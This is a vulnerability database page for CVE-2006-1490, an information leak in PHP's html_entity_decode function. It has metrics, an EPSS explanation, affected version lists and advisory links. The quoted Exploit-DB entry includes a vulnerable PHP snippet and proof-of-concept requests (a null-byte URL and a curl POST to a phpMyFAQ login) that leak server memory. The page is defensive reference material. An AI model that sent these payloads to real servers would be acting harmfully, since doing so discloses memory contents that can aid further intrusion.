CVE-2006-1490 : Detail

CVE-2006-1490

34.26%V3
Network
2006-03-29
19h00 +00:00
2018-10-18
12h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PHP before 5.1.3-RC1 might allow remote attackers to obtain portions of memory via crafted binary data sent to a script that processes user input in the html_entity_decode function and sends the encoded results back to the client, aka a "binary safety" issue. NOTE: this issue has been referred to as a "memory leak," but it is an information leak that discloses memory contents.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 27508

Publication date : 2006-03-28 22h00 +00:00
Author : Samuel
EDB Verified : Yes

source: https://www.securityfocus.com/bid/17296/info PHP 'html_entity_decode()' function is prone to an information-disclosure vulnerability. This issue arises when a script using the function accepts data from a remote untrusted source and returns the function's result to an attacker. Information that the attacker gathers by exploiting this vulnerability may aid in other attacks. PHP versions prior to 5.1.3-RC1 are vulnerable to this issue. <?php $foobar=html_entity_decode($_GET['foo']); echo $foobar; ?> Running it with url: http://www.example.com/index.php?foo=%00sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss! ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss! ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss curl "http://www.example.com/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

Products Mentioned

Configuraton 0

Php>>Php >> Version 3.0

Php>>Php >> Version 3.0.1

Php>>Php >> Version 3.0.2

Php>>Php >> Version 3.0.3

Php>>Php >> Version 3.0.4

Php>>Php >> Version 3.0.5

Php>>Php >> Version 3.0.6

Php>>Php >> Version 3.0.7

Php>>Php >> Version 3.0.8

Php>>Php >> Version 3.0.9

Php>>Php >> Version 3.0.10

Php>>Php >> Version 3.0.11

Php>>Php >> Version 3.0.12

Php>>Php >> Version 3.0.13

Php>>Php >> Version 3.0.14

Php>>Php >> Version 3.0.15

Php>>Php >> Version 3.0.16

Php>>Php >> Version 3.0.17

Php>>Php >> Version 3.0.18

Php>>Php >> Version 4.0.0

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.2

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.4

Php>>Php >> Version 4.0.5

Php>>Php >> Version 4.0.6

Php>>Php >> Version 4.0.7

Php>>Php >> Version 4.0.7

Php>>Php >> Version 4.0.7

Php>>Php >> Version 4.0.7

Php>>Php >> Version 4.1.0

Php>>Php >> Version 4.1.1

Php>>Php >> Version 4.1.2

Php>>Php >> Version 4.2

    Php>>Php >> Version 4.2.0

    Php>>Php >> Version 4.2.1

    Php>>Php >> Version 4.2.2

    Php>>Php >> Version 4.2.3

    Php>>Php >> Version 4.3.0

    Php>>Php >> Version 4.3.1

    Php>>Php >> Version 4.3.2

    Php>>Php >> Version 4.3.3

    Php>>Php >> Version 4.3.4

    Php>>Php >> Version 4.3.5

    Php>>Php >> Version 4.3.6

    Php>>Php >> Version 4.3.7

    Php>>Php >> Version 4.3.8

    Php>>Php >> Version 4.3.9

    Php>>Php >> Version 4.3.10

    Php>>Php >> Version 4.3.11

    Php>>Php >> Version 4.4.0

    Php>>Php >> Version 4.4.1

    Php>>Php >> Version 4.4.2

    Php>>Php >> Version 5.0

      Php>>Php >> Version 5.0

        Php>>Php >> Version 5.0

          Php>>Php >> Version 5.0.0

          Php>>Php >> Version 5.0.0

          Php>>Php >> Version 5.0.0

          Php>>Php >> Version 5.0.0

          Php>>Php >> Version 5.0.0

          Php>>Php >> Version 5.0.0

          Php>>Php >> Version 5.0.0

          Php>>Php >> Version 5.0.0

          Php>>Php >> Version 5.0.1

          Php>>Php >> Version 5.0.2

          Php>>Php >> Version 5.0.3

          Php>>Php >> Version 5.0.4

          Php>>Php >> Version 5.0.5

          Php>>Php >> Version 5.1.0

          Php>>Php >> Version 5.1.1

          Php>>Php >> Version 5.1.2

          References

          http://www.mandriva.com/security/advisories?name=MDKSA-2006:063
          Tags : vendor-advisory, x_refsource_MANDRIVA
          http://www.vupen.com/english/advisories/2006/4750
          Tags : vdb-entry, x_refsource_VUPEN
          http://secunia.com/advisories/19499
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.securityfocus.com/bid/17296
          Tags : vdb-entry, x_refsource_BID
          http://secunia.com/advisories/20210
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://rhn.redhat.com/errata/RHSA-2006-0276.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://security.gentoo.org/glsa/glsa-200605-08.xml
          Tags : vendor-advisory, x_refsource_GENTOO
          http://secunia.com/advisories/19570
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/19383
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.ubuntu.com/usn/usn-320-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://secunia.com/advisories/23155
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/19979
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/20951
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/21125
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/19832
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.us-cert.gov/cas/techalerts/TA06-333A.html
          Tags : third-party-advisory, x_refsource_CERT
          http://secunia.com/advisories/20052
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.trustix.org/errata/2006/0020
          Tags : vendor-advisory, x_refsource_TRUSTIX
          http://www.vupen.com/english/advisories/2006/2685
          Tags : vdb-entry, x_refsource_VUPEN
          http://www.vupen.com/english/advisories/2006/1149
          Tags : vdb-entry, x_refsource_VUPEN